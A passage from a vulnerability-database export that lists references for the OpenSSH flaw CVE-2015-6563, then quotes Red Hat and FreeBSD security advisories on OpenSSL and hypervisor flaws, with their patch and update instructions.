Advisories: SA104 : OpenSSH Vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=symantec_security_advisories\u0026qid=b643e473a764678a8d1ded300d5699b6" }, { "title": "Oracle Linux Bulletins: Oracle Linux Bulletin - April 2016", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_linux_bulletins\u0026qid=83bbd91f8369c8f064e6d68dac68400f" }, { "title": "Oracle Linux Bulletins: Oracle Linux Bulletin - October 2015", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_linux_bulletins\u0026qid=435ed9abc2fb1e74ce2a69605a01e326" }, { "title": "Oracle Solaris Third Party Bulletins: Oracle Solaris Third Party Bulletin - January 2016", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_solaris_third_party_bulletins\u0026qid=eb439566c9130adc92d21bc093204cf8" }, { "title": "manual-detection", "trust": 0.1, "url": "https://github.com/cycognito/manual-detection " }, { "title": "DC-2-Vulnhub-Walkthrough", "trust": 0.1, "url": "https://github.com/vshaliii/dc-2-vulnhub-walkthrough " }, { "title": "DC-1-Vulnhub-Walkthrough", "trust": 0.1, "url": "https://github.com/vshaliii/dc-1-vulnhub-walkthrough " } ], "sources": [ { "db": "VULMON", "id": "CVE-2015-6563" }, { "db": "JVNDB", "id": "JVNDB-2015-004403" }, { "db": "CNNVD", "id": "CNNVD-201508-504" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-20", "trust": 1.9 } ], "sources": [ { "db": "VULHUB", "id": "VHN-84524" }, { "db": "JVNDB", "id": "JVNDB-2015-004403" }, { "db": "NVD", "id": "CVE-2015-6563" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 3.0, "url": "http://www.securityfocus.com/bid/76317" }, { "trust": 2.1, "url": "http://www.openssh.com/txt/release-7.0" }, { "trust": 2.1, "url": "http://www.oracle.com/technetwork/topics/security/bulletinjan2016-2867206.html" }, { "trust": 2.1, "url": "http://www.oracle.com/technetwork/topics/security/linuxbulletinoct2015-2719645.html" }, { "trust": 2.1, "url": "https://github.com/openssh/openssh-portable/commit/d4697fe9a28dab7255c60433e4dd23cf7fce8a8b" }, { "trust": 1.9, "url": "https://security.gentoo.org/glsa/201512-04" }, { "trust": 1.9, "url": "http://rhn.redhat.com/errata/rhsa-2016-0741.html" }, { "trust": 1.8, "url": "http://lists.apple.com/archives/security-announce/2015/oct/msg00005.html" }, { "trust": 1.8, "url": "http://www.oracle.com/technetwork/topics/security/linuxbulletinapr2016-2952096.html" }, { "trust": 1.8, "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-412672.pdf" }, { "trust": 1.8, "url": "https://security.netapp.com/advisory/ntap-20180201-0002/" }, { "trust": 1.8, "url": "https://support.apple.com/ht205375" }, { "trust": 1.8, "url": "https://www.broadcom.com/support/fibre-channel-networking/security-advisories/brocade-security-advisory-2019-766" }, { "trust": 1.8, "url": "http://lists.fedoraproject.org/pipermail/package-announce/2015-august/165170.html" }, { "trust": 1.8, "url": "http://seclists.org/fulldisclosure/2015/aug/54" }, { "trust": 1.8, "url": "https://lists.debian.org/debian-lts-announce/2018/09/msg00010.html" }, { "trust": 1.8, "url": "http://www.openwall.com/lists/oss-security/2015/08/22/1" }, { "trust": 1.8, "url": "http://lists.opensuse.org/opensuse-security-announce/2015-09/msg00017.html" }, { "trust": 0.8, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-6563" }, { "trust": 0.8, "url": "http://jvn.jp/vu/jvnvu92655282/" }, { "trust": 0.8, "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2015-6563" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-6563" }, { "trust": 0.3, "url": "https://access.redhat.com/security/cve/cve-2015-6563" }, { "trust": 0.3, "url": "https://github.com/openssh/openssh-portable/commit/5e75f5198769056089fb06c4d738ab0e5abc66f7 " }, { "trust": 0.3, "url": "http://www.openssh.com" }, { "trust": 0.3, "url": "https://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10774\u0026actp=rss" }, { "trust": 0.3, "url": "http://aix.software.ibm.com/aix/efixes/security/openssh_advisory6.asc" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1024087" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1024669" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=nas8n1021524" }, { "trust": 0.3, "url": "http://www.pexip.com/sites/pexip/files/pexip_security_bulletin_2015-08-21.pdf" }, { "trust": 0.3, "url": "https://kc.mcafee.com/resources/sites/mcafee/content/live/product_documentation/27000/pd27128/en_us/meg_7_6_406_3402_103_release_notes_en_us.pdf" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1009325" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21987978" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21988706" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21990741" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21992927" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-6564" }, { "trust": 0.2, "url": "https://www.redhat.com/mailman/listinfo/rhsa-announce" }, { "trust": 0.2, "url": "https://access.redhat.com/security/cve/cve-2015-6564" }, { "trust": 0.2, "url": "https://bugzilla.redhat.com/):" }, { "trust": 0.2, "url": "https://access.redhat.com/security/team/key/" }, { "trust": 0.2, "url": "https://access.redhat.com/articles/11258" }, { "trust": 0.2, "url": "https://access.redhat.com/security/updates/classification/#moderate" }, { "trust": 0.2, "url": "https://access.redhat.com/security/team/contact/" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5352" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5600" }, { "trust": 0.1, "url": "https://cwe.mitre.org/data/definitions/20.html" }, { "trust": 0.1, "url": "https://access.redhat.com/errata/rhsa-2015:2088" }, { "trust": 0.1, "url": "https://nvd.nist.gov" }, { "trust": 0.1, "url": "https://www.cisa.gov/uscert/ics/advisories/icsa-22-349-21" }, { "trust": 0.1, "url": "http://tools.cisco.com/security/center/viewalert.x?alertid=41651" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5925" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5936" }, { "trust": 0.1, "url": "https://support.apple.com/kb/ht201222" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-6836" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0235" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5943" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5924" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5945" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-6834" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5935" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5944" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5942" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3565" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-6837" }, { "trust": 0.1, "url": "http://www.apple.com/support/downloads/" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5940" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5927" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5933" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5939" }, { "trust": 0.1, "url": "https://support.apple.com/kb/ht205377" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5934" }, { "trust": 0.1, "url": "https://www.apple.com/support/security/pgp/" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-6835" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-6838" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-6151" }, { "trust": 0.1, "url": "http://gpgtools.org" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5938" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-6974" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0273" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5926" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5937" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5932" }, { "trust": 0.1, "url": "https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/6.8_release_notes/index.html" }, { "trust": 0.1, "url": "https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/6.8_technical_notes/index.html" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2015-5352" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-1908" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1908" }, { "trust": 0.1, "url": "https://rhn.redhat.com/errata/rhsa-2015-2088.html" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2015-5600" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-5352" }, { "trust": 0.1, "url": "http://creativecommons.org/licenses/by-sa/2.5" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-6565" }, { "trust": 0.1, "url": "https://bugs.gentoo.org." }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-6565" }, { "trust": 0.1, "url": "https://security.gentoo.org/" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-5600" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-6563" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-6564" } ], "sources": [ { "db": "VULHUB", "id": "VHN-84524" }, { "db": "VULMON", "id": "CVE-2015-6563" }, { "db": "BID", "id": "76317" }, { "db": "JVNDB", "id": "JVNDB-2015-004403" }, { "db": "PACKETSTORM", "id": "134055" }, { "db": "PACKETSTORM", "id": "136959" }, { "db": "PACKETSTORM", "id": "134475" }, { "db": "PACKETSTORM", "id": "135009" }, { "db": "NVD", "id": "CVE-2015-6563" }, { "db": "CNNVD", "id": "CNNVD-201508-115" }, { "db": "CNNVD", "id": "CNNVD-201508-504" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "VULHUB", "id": "VHN-84524" }, { "db": "VULMON", "id": "CVE-2015-6563" }, { "db": "BID", "id": "76317" }, { "db": "JVNDB", "id": "JVNDB-2015-004403" }, { "db": "PACKETSTORM", "id": "134055" }, { "db": "PACKETSTORM", "id": "136959" }, { "db": "PACKETSTORM", "id": "134475" }, { "db": "PACKETSTORM", "id": "135009" }, { "db": "NVD", "id": "CVE-2015-6563" }, { "db": "CNNVD", "id": "CNNVD-201508-115" }, { "db": "CNNVD", "id": "CNNVD-201508-504" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2015-08-24T00:00:00", "db": "VULHUB", "id": "VHN-84524" }, { "date": "2015-08-24T00:00:00", "db": "VULMON", "id": "CVE-2015-6563" }, { "date": "2015-08-12T00:00:00", "db": "BID", "id": "76317" }, { "date": "2015-08-26T00:00:00", "db": "JVNDB", "id": "JVNDB-2015-004403" }, { "date": "2015-10-21T19:32:22", "db": "PACKETSTORM", "id": "134055" }, { "date": "2016-05-11T13:59:48", "db": "PACKETSTORM", "id": "136959" }, { "date": "2015-11-20T00:47:23", "db": "PACKETSTORM", "id": "134475" }, { "date": "2015-12-21T23:23:00", "db": "PACKETSTORM", "id": "135009" }, { "date": "2015-08-24T01:59:00.127000", "db": "NVD", "id": "CVE-2015-6563" }, { "date": "2015-08-13T00:00:00", "db": "CNNVD", "id": "CNNVD-201508-115" }, { "date": "2015-08-25T00:00:00", "db": "CNNVD", "id": "CNNVD-201508-504" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2022-12-13T00:00:00", "db": "VULHUB", "id": "VHN-84524" }, { "date": "2022-12-13T00:00:00", "db": "VULMON", "id": "CVE-2015-6563" }, { "date": "2017-12-19T22:37:00", "db": "BID", "id": "76317" }, { "date": "2015-10-27T00:00:00", "db": "JVNDB", "id": "JVNDB-2015-004403" }, { "date": "2022-12-13T12:15:17.460000", "db": "NVD", "id": "CVE-2015-6563" }, { "date": "2015-08-13T00:00:00", "db": "CNNVD", "id": "CNNVD-201508-115" }, { "date": "2022-12-14T00:00:00", "db": "CNNVD", "id": "CNNVD-201508-504" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-201508-115" } ], "trust": 0.6 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "OpenBSD Run on other platforms OpenSSH of sshd Vulnerabilities that allow spoofing attacks in the monitor component", "sources": [ { "db": "JVNDB", "id": "JVNDB-2015-004403" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "code injection", "sources": [ { "db": "CNNVD", "id": "CNNVD-201508-115" } ], "trust": 0.6 } }
var-201201-0170
Vulnerability from variot
Double free vulnerability in OpenSSL 0.9.8 before 0.9.8s, when X509_V_FLAG_POLICY_CHECK is enabled, allows remote attackers to have an unspecified impact by triggering failure of a policy check. Fiery Network Controllers for Xerox DocuColor 242/252/260 Printer/Copier use a vulnerable version of OpenSSL (0.9.8o). OpenSSL prone to multiple security vulnerabilities. An attacker may leverage these issues to obtain sensitive information, cause a denial-of-service condition and perform unauthorized actions.
Multiple numeric conversion errors, leading to a buffer overflow, were found in the way OpenSSL parsed ASN.1 (Abstract Syntax Notation One) data from BIO (OpenSSL's I/O abstraction) inputs. Specially-crafted DER (Distinguished Encoding Rules) encoded data read from a file or other BIO input could cause an application using the OpenSSL library to crash or, potentially, execute arbitrary code.
Warning: Before applying this update, back up your JBoss Enterprise Application Platform's "server/[PROFILE]/deploy/" directory, along with all other customized configuration files.
All users of JBoss Enterprise Application Platform 5.1.2 for Solaris and Microsoft Windows as provided from the Red Hat Customer Portal are advised to apply this update. Solution:
The References section of this erratum contains a download link (you must log in to download the update). Before applying the update, back up your existing JBoss Enterprise Application Platform installation (including all applications and configuration files). -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
===================================================================== Red Hat Security Advisory
Synopsis: Important: rhev-hypervisor5 security and bug fix update Advisory ID: RHSA-2012:0168-01 Product: Red Hat Enterprise Virtualization Advisory URL: https://rhn.redhat.com/errata/RHSA-2012-0168.html Issue date: 2012-02-21 CVE Names: CVE-2011-4109 CVE-2011-4576 CVE-2011-4619 CVE-2012-0029 CVE-2012-0207 =====================================================================
- Summary:
An updated rhev-hypervisor5 package that fixes several security issues and various bugs is now available.
The Red Hat Security Response Team has rated this update as having important security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.
- Relevant releases/architectures:
RHEV Hypervisor for RHEL-5 - noarch
- Description:
The rhev-hypervisor5 package provides a Red Hat Enterprise Virtualization Hypervisor ISO disk image. The Red Hat Enterprise Virtualization Hypervisor is a dedicated Kernel-based Virtual Machine (KVM) hypervisor. It includes everything necessary to run and manage virtual machines: A subset of the Red Hat Enterprise Linux operating environment and the Red Hat Enterprise Virtualization Agent.
Note: Red Hat Enterprise Virtualization Hypervisor is only available for the Intel 64 and AMD64 architectures with virtualization extensions.
A heap overflow flaw was found in the way QEMU-KVM emulated the e1000 network interface card. A privileged guest user in a virtual machine whose network interface is configured to use the e1000 emulated driver could use this flaw to crash the host or, possibly, escalate their privileges on the host. (CVE-2012-0029)
A divide-by-zero flaw was found in the Linux kernel's igmp_heard_query() function. An attacker able to send certain IGMP (Internet Group Management Protocol) packets to a target system could use this flaw to cause a denial of service. (CVE-2011-4109)
An information leak flaw was found in the SSL 3.0 protocol implementation in OpenSSL. Incorrect initialization of SSL record padding bytes could cause an SSL client or server to send a limited amount of possibly sensitive data to its SSL peer via the encrypted connection. (CVE-2011-4576)
It was discovered that OpenSSL did not limit the number of TLS/SSL handshake restarts required to support Server Gated Cryptography. A remote attacker could use this flaw to make a TLS/SSL server using OpenSSL consume an excessive amount of CPU by continuously restarting the handshake. (CVE-2011-4619)
Red Hat would like to thank Nicolae Mogoreanu for reporting CVE-2012-0029, and Simon McVittie for reporting CVE-2012-0207.
This updated package provides updated components that include fixes for various security issues. These issues have no security impact on Red Hat Enterprise Virtualization Hypervisor itself, however. The security fixes included in this update address the following CVE numbers:
CVE-2006-1168 and CVE-2011-2716 (busybox issues)
CVE-2009-5029, CVE-2009-5064, CVE-2010-0830 and CVE-2011-1089 (glibc issues)
CVE-2011-1083, CVE-2011-3638, CVE-2011-4086, CVE-2011-4127 and CVE-2012-0028 (kernel issues)
CVE-2011-1526 (krb5 issue)
CVE-2011-4347 (kvm issue)
CVE-2010-4008, CVE-2011-0216, CVE-2011-2834, CVE-2011-3905, CVE-2011-3919 and CVE-2011-1944 (libxml2 issues)
CVE-2011-1749 (nfs-utils issue)
CVE-2011-4108 (openssl issue)
CVE-2011-0010 (sudo issue)
CVE-2011-1675 and CVE-2011-1677 (util-linux issues)
CVE-2010-0424 (vixie-cron issue)
This updated rhev-hypervisor5 package fixes various bugs. Documentation of these changes will be available shortly in the Technical Notes document:
https://docs.redhat.com/docs/en-US/Red_Hat_Enterprise_Virtualization_for_Servers/2.2/html/Technical_Notes/index.html
Users of Red Hat Enterprise Virtualization Hypervisor are advised to upgrade to this updated package, which fixes these issues.
- Solution:
Before applying this update, make sure all previously-released errata relevant to your system have been applied.
This update is available via the Red Hat Network. Details on how to use the Red Hat Network to apply this update are available at https://access.redhat.com/kb/docs/DOC-11259
- Bugs fixed (http://bugzilla.redhat.com/):
606191 - after upgrade , reboot can't shut off network successfully and back to firstboot menu again 627538 - System will not boot sometimes when using rhevm to do upgrade twice. 650179 - rhevm bridge came up instead of breth0 after fail to configure network 675325 - Changes to networking always clear the contents of resolv.conf 696875 - RHEVH bootup hanging in ovirt-early when doing LVM scanning 717535 - [RFE] No confirm message for ntp server setting 728895 - RHEV-H rpm should include a versions text file 732948 - CCISS: Auto install fail at creating physical volume. 734110 - rhevh - upgrade ovirt node fails due to nonexistent breth0 734480 - [RFE] Add virt-who package to RHEVH 734710 - Register RHN satellite will fail if RHN satellite password include space. 740127 - Provide our CPE name in a new system file 743938 - Make rhev-hypervisor RPM multi-installable like the kernel 747519 - RHEV-H 5.8 register to RHN will fail. 747647 - Change rhev-hypervisor RPM to be rhev-hypervisor5 to allow coinstallations with rhev-hypervisor6 756178 - remove redundant brcm-iscsi.log rotation from ovirt-node now that it is in iscsi-initiator-utils 758465 - RHEV-H 5.8 register to RHN will fail if password contains quotes or spaces 759462 - Can not retrieve running guests UUID in RHEVH node. 759632 - virt-who debugging output going to stderr always 759635 - Revert workaround of virt-who output 761357 - Multipathd service is stopped by default cause change password failed in single mode. 768256 - network layout is incorrect when configure network with nic up 771771 - CVE-2011-4109 openssl: double-free in policy checks 771775 - CVE-2011-4576 openssl: uninitialized SSL 3.0 padding 771780 - CVE-2011-4619 openssl: SGC restart DoS attack 772075 - CVE-2012-0029 qemu-kvm: e1000: process_tx_desc legacy mode packets heap overflow 772867 - CVE-2012-0207 kernel: igmp: Avoid zero delay when receiving odd mixture of IGMP queries 783625 - The setup command should only allow password setting and viewing logs in single mode.
- Package List:
RHEV Hypervisor for RHEL-5:
noarch: rhev-hypervisor5-5.8-20120202.0.el5.noarch.rpm rhev-hypervisor5-tools-5.8-20120202.0.el5.noarch.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/#package
- References:
https://www.redhat.com/security/data/cve/CVE-2011-4109.html https://www.redhat.com/security/data/cve/CVE-2011-4576.html https://www.redhat.com/security/data/cve/CVE-2011-4619.html https://www.redhat.com/security/data/cve/CVE-2012-0029.html https://www.redhat.com/security/data/cve/CVE-2012-0207.html https://access.redhat.com/security/updates/classification/#important https://docs.redhat.com/docs/en-US/Red_Hat_Enterprise_Virtualization_for_Servers/2.2/html/Technical_Notes/index.html
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2012 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.4 (GNU/Linux)
iD8DBQFPQ1yHXlSAg2UNWIIRAl9/AJ9JmPpSO5U2xwDBKDZA8y5To8EVcwCfZFGN bzF952CZ/r5T3LUF9kY6X8c= =IdNq -----END PGP SIGNATURE-----
-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
============================================================================= FreeBSD-SA-12:01.openssl Security Advisory The FreeBSD Project
Topic: OpenSSL multiple vulnerabilities
Category: contrib Module: openssl Announced: 2012-05-03 Credits: Adam Langley, George Kadianakis, Ben Laurie, Ivan Nestlerode, Tavis Ormandy Affects: All supported versions of FreeBSD. Corrected: 2012-05-03 15:25:11 UTC (RELENG_7, 7.4-STABLE) 2012-05-03 15:25:11 UTC (RELENG_7_4, 7.4-RELEASE-p7) 2012-05-03 15:25:11 UTC (RELENG_8, 8.3-STABLE) 2012-05-03 15:25:11 UTC (RELENG_8_3, 8.3-RELEASE-p1) 2012-05-03 15:25:11 UTC (RELENG_8_2, 8.2-RELEASE-p7) 2012-05-03 15:25:11 UTC (RELENG_8_1, 8.1-RELEASE-p9) 2012-05-03 15:25:11 UTC (RELENG_9, 9.0-STABLE) 2012-05-03 15:25:11 UTC (RELENG_9_0, 9.0-RELEASE-p1) CVE Name: CVE-2011-4576, CVE-2011-4619, CVE-2011-4109, CVE-2012-0884, CVE-2012-2110
For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit
FreeBSD includes software from the OpenSSL Project. The OpenSSL Project is a collaborative effort to develop a robust, commercial-grade, full-featured Open Source toolkit implementing the Secure Sockets Layer (SSL v2/v3) and Transport Layer Security (TLS v1) protocols as well as a full-strength general purpose cryptography library.
II. This could include sensitive contents of previously freed memory. [CVE-2011-4109]
A weakness in the OpenSSL PKCS #7 code can be exploited using Bleichenbacher's attack on PKCS #1 v1.5 RSA padding also known as the million message attack (MMA). [CVE-2012-0884]
The asn1_d2i_read_bio() function, used by the d2i_bio and d2i_fp functions, in OpenSSL contains multiple integer errors that can cause memory corruption when parsing encoded ASN.1 data. This error can occur on systems that parse untrusted ASN.1 data, such as X.509 certificates or RSA public keys. [CVE-2012-2110]
III. Impact
Sensitive contents of the previously freed memory can be exposed when communicating with a SSL 3.0 peer. However, FreeBSD OpenSSL version does not support SSL_MODE_RELEASE_BUFFERS SSL mode and therefore have a single write buffer per connection. That write buffer is partially filled with non-sensitive, handshake data at the beginning of the connection and, thereafter, only records which are longer than any previously sent record leak any non-encrypted data. This, combined with the small number of bytes leaked per record, serves to limit to severity of this issue. [CVE-2011-4619]
The double-free, when an application performs X509 certificate policy checking, can lead to denial of service in that application. [CVE-2011-4109]
A weakness in the OpenSSL PKCS #7 code can lead to a successful Bleichenbacher attack. Only users of PKCS #7 decryption operations are affected. A successful attack needs on average 2^20 messages. In practice only automated systems will be affected as humans will not be willing to process this many messages. SSL/TLS applications are not affected. [CVE-2012-0884]
The vulnerability in the asn1_d2i_read_bio() OpenSSL function can lead to a potentially exploitable attack via buffer overflow. The SSL/TLS code in OpenSSL is not affected by this issue, nor are applications using the memory based ASN.1 functions. There are no applications in FreeBSD base system affected by this issue, though some 3rd party consumers of these functions might be vulnerable when processing untrusted ASN.1 data. [CVE-2012-2110]
IV. Workaround
No workaround is available.
V. Solution
Perform one of the following:
1) Upgrade your vulnerable system to 7-STABLE, 8-STABLE or 9-STABLE, or to the RELENG_7_4, RELENG_8_3, RELENG_8_2, RELENG_8_1, RELENG_9_0 security branch dated after the correction date.
2) To update your vulnerable system via a source code patch:
The following patches have been verified to apply to FreeBSD 7.4, 8.3, 8.2, 8.1, and 9.0 systems.
a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility.
fetch http://security.FreeBSD.org/patches/SA-12:01/openssl.patch
fetch http://security.FreeBSD.org/patches/SA-12:01/openssl.patch.asc
b) Execute the following commands as root:
cd /usr/src
patch < /path/to/patch
c) Recompile the operating system as described in
NOTE: Any third-party applications, including those installed from the FreeBSD ports collection, which are statically linked to libcrypto(3) should be recompiled in order to use the corrected code.
3) To update your vulnerable system via a binary patch:
Systems running 7.4-RELEASE, 8.3-RELEASE, 8.2-RELEASE, 8.1-RELEASE or 9.0-RELEASE on the i386 or amd64 platforms can be updated via the freebsd-update(8) utility:
freebsd-update fetch
freebsd-update install
VI. Correction details
The following list contains the revision numbers of each file that was corrected in FreeBSD.
CVS:
Branch Revision Path
RELENG_7 src/crypto/openssl/crypto/pkcs7/pk7_doit.c 1.1.1.13.2.2 src/crypto/openssl/crypto/mem.c 1.1.1.8.2.2 src/crypto/openssl/crypto/x509v3/pcy_map.c 1.1.1.1.2.2 src/crypto/openssl/crypto/x509v3/pcy_tree.c 1.1.1.2.2.2 src/crypto/openssl/crypto/asn1/a_d2i_fp.c 1.1.1.3.2.1 src/crypto/openssl/crypto/buffer/buffer.c 1.1.1.4.2.2 src/crypto/openssl/ssl/ssl_err.c 1.1.1.11.2.3 src/crypto/openssl/ssl/s3_srvr.c 1.1.1.17.2.7 src/crypto/openssl/ssl/ssl.h 1.1.1.16.2.3 src/crypto/openssl/ssl/s3_enc.c 1.1.1.13.2.2 src/crypto/openssl/ssl/ssl3.h 1.1.1.6.2.2 RELENG_7_4 src/UPDATING 1.507.2.36.2.9 src/sys/conf/newvers.sh 1.72.2.18.2.12 src/crypto/openssl/crypto/pkcs7/pk7_doit.c 1.1.1.13.2.1.2.1 src/crypto/openssl/crypto/mem.c 1.1.1.8.2.1.2.1 src/crypto/openssl/crypto/x509v3/pcy_map.c 1.1.1.1.2.1.2.1 src/crypto/openssl/crypto/x509v3/pcy_tree.c 1.1.1.2.2.1.2.1 src/crypto/openssl/crypto/asn1/a_d2i_fp.c 1.1.1.3.20.1 src/crypto/openssl/crypto/buffer/buffer.c 1.1.1.4.2.1.2.1 src/crypto/openssl/ssl/ssl_err.c 1.1.1.11.2.2.2.1 src/crypto/openssl/ssl/s3_srvr.c 1.1.1.17.2.5.2.1 src/crypto/openssl/ssl/ssl.h 1.1.1.16.2.2.2.1 src/crypto/openssl/ssl/s3_enc.c 1.1.1.13.2.1.2.1 src/crypto/openssl/ssl/ssl3.h 1.1.1.6.2.1.2.1 RELENG_8 src/crypto/openssl/crypto/pkcs7/pk7_doit.c 1.1.1.13.10.2 src/crypto/openssl/crypto/mem.c 1.2.2.1 src/crypto/openssl/crypto/x509v3/pcy_map.c 1.2.2.1 src/crypto/openssl/crypto/x509v3/pcy_tree.c 1.2.2.2 src/crypto/openssl/crypto/asn1/a_d2i_fp.c 1.1.1.3.10.1 src/crypto/openssl/crypto/buffer/buffer.c 1.2.2.1 src/crypto/openssl/ssl/ssl_err.c 1.2.2.2 src/crypto/openssl/ssl/s3_srvr.c 1.3.2.5 src/crypto/openssl/ssl/ssl.h 1.2.2.2 src/crypto/openssl/ssl/s3_enc.c 1.2.2.2 src/crypto/openssl/ssl/ssl3.h 1.2.2.2 RELENG_8_3 src/UPDATING 1.632.2.26.2.3 src/sys/conf/newvers.sh 1.83.2.15.2.5 src/crypto/openssl/crypto/pkcs7/pk7_doit.c 1.1.1.13.10.1.4.1 src/crypto/openssl/crypto/mem.c 1.2.14.1 src/crypto/openssl/crypto/x509v3/pcy_map.c 1.2.14.1 src/crypto/openssl/crypto/x509v3/pcy_tree.c 1.2.2.1.6.1 src/crypto/openssl/crypto/asn1/a_d2i_fp.c 1.1.1.3.26.1 src/crypto/openssl/crypto/buffer/buffer.c 1.2.14.1 src/crypto/openssl/ssl/ssl_err.c 1.2.2.1.6.1 src/crypto/openssl/ssl/s3_srvr.c 1.3.2.4.2.1 src/crypto/openssl/ssl/ssl.h 1.2.2.1.6.1 src/crypto/openssl/ssl/s3_enc.c 1.2.2.1.4.1 